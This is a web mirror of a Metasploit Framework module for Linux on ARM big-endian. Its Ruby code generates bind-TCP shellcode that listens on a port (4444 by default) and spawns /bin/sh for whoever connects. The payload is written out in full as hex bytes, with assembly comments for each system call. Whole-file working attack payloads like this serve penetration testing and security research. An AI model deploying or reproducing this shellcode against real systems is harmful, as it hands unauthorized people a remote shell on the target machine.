Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb
19516 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
module MetasploitModule

7
  CachedSize = 118

8


9
  include Msf::Payload::Single

10
  include Msf::Sessions::CommandShellOptions

11


12
  def initialize(info = {})

13
    super(

14
      merge_info(

15
        info,

16
        'Name' => 'Linux ARM Big Endian Command Shell, Bind TCP Inline',

17
        'Description' => 'Listen for a connection and spawn a command shell',

18
        'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',

19
        'References' => [['URL', 'https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s']],

20
        'License' => MSF_LICENSE,

21
        'Platform' => 'linux',

22
        'Arch' => ARCH_ARMBE,

23
        'Handler' => Msf::Handler::BindTcp,

24
        'Session' => Msf::Sessions::CommandShellUnix

25
      )

26
    )

27
    # Register command execution options

28
    register_options(

29
      [

30
        OptString.new('CMD', [ true, 'The command to execute.', '/bin/sh' ]),

31
        Opt::LPORT(4444)

32
      ]

33
    )

34
  end

35


36
  def generate(_opts = {})

37
    cmd = (datastore['CMD'] || '') + "\x00"

38
    bytehigh = (datastore['LPORT'].to_i >> 8).chr

39
    bytelow = (datastore['LPORT'].to_i & 0xFF).chr

40


41
    "\xe2\x8f\x60\x01"	+ #	add 	r6, pc, #1	#

42
      "\xe1\x2f\xff\x16"	+ #	bx	r6		#

43


44
      # thumb mode on

45
      # socket(2,1,0)

46
      "\x1a\x92"	+ #	sub	r2, r2, r2	#

47
      "\x1c\x51"	+ #	add	r1, r2, #1	#

48
      "\x1c\x90"	+ #	add	r0, r2, #2	#

49
      "\x02\x0f"	+ #	lsl	r7, r1, #8	#

50
      "\x37\x19"	+ #	add	r7, r7, #0x19	#

51
      "\xdf\x01"	+ #	svc	1		#

52
      "\x1c\x06"	+ #	mov	r6, r0		#

53


54
      # bind()

55
      "\x22\x02"	+ #	mov	r2, #2		#

56
      "\x02\x12"	+ #	lsl	r2, r2, #8	#

57
      "\x32" + bytehigh	+ #	add	r2, r2, #0xXX	#

58
      "\x02\x12"	+ #	lsl	r2, r2, #8	#

59
      "\x32" + bytelow	+ #	add	r2, r2, #0xXX	#

60
      "\x1a\xdb"	+ #	sub	r3, r3, r3	#

61
      "\x1b\x24"	+ #	sub	r4, r4, r4	#

62
      "\x1b\x6d"	+ #	sub 	r5, r5, r5	#

63
      "\x46\x69"	+ #	mov	r1, sp		#

64
      "\xc1\x3c"	+ #	stm	r1!, {r2-r5}	#

65
      "\x39\x10"	+ #	sub	r1, #0x10	#

66
      "\x22\x10"	+ #	mov	r2, #16		#

67
      "\x37\x01"	+ #	add	r7, r7, #1	#

68
      "\xdf\x01"	+ #	svc	1		#

69


70
      # listen()

71
      "\x1c\x30"	+ #	mov	r0, r6		#

72
      "\x1a\x49"	+ #	sub	r1, r1, r1	#

73
      "\x37\x02"	+ #	add	r7, r7, #2	#

74
      "\xdf\x01"	+ #	svc	1		#

75


76
      # accept()

77
      "\x1c\x30"	+ #	mov	r0, r6		#

78
      "\x1a\x92"	+ #	sub	r2, r2, r2	#

79
      "\x37\x01"	+ #	add	r7, r7, #1	#

80
      "\xdf\x01"	+ #	svc	1		#

81
      "\x1c\x06"	+ #	mov	r6, r0		#

82


83
      # dup2()

84
      "\x1a\x49"	+ #	sub	r1, r1, r1	#

85
      "\x27\x3f"	+ #	mov	r7, #63	#

86
      "\xdf\x01"	+ #	svc     1		#

87
      "\x1c\x30"	+ #	mov	r0, r6	#

88
      "\x31\x01"	+ #	add	r1, r1, #1	#

89
      "\xdf\x01"	+ #	svc     1		#

90
      "\x1c\x30"	+ #	mov	r0, r6	#

91
      "\x31\x01"	+ #	add	r1, r1, #1	#

92
      "\xdf\x01"	+ #	svc     1		#

93


94
      # execve()

95
      "\x1a\x92"	+ #	sub	r2, r2, r2	#

96
      "\x46\x78"	+ #	mov 	r0, pc		#

97
      "\x30\x12"	+ #	add 	r0, #18		#

98
      "\x92\x02"	+ #	str	r2, [sp, #8]	#

99
      "\x90\x01"	+ #	str	r0, [sp, #4]	#

100
      "\xa9\x01"	+ #	add 	r1, sp, #4	#

101
      "\x27\x0b"	+ #	mov 	r7, #11		#

102
      "\xdf\x01"	+ #	svc 	1		#

103


104
      # exit()

105
      "\x1b\x24"	+ #	sub	r4, r4, r4	#

106
      "\x1c\x20"	+ #	mov	r0, r4		#

107
      "\x27\x01"	+ #	mov 	r7, #1		#

108
      "\xdf\x01"	+ #	svc 	1		#

109
      cmd

110
  end

111
end

112


113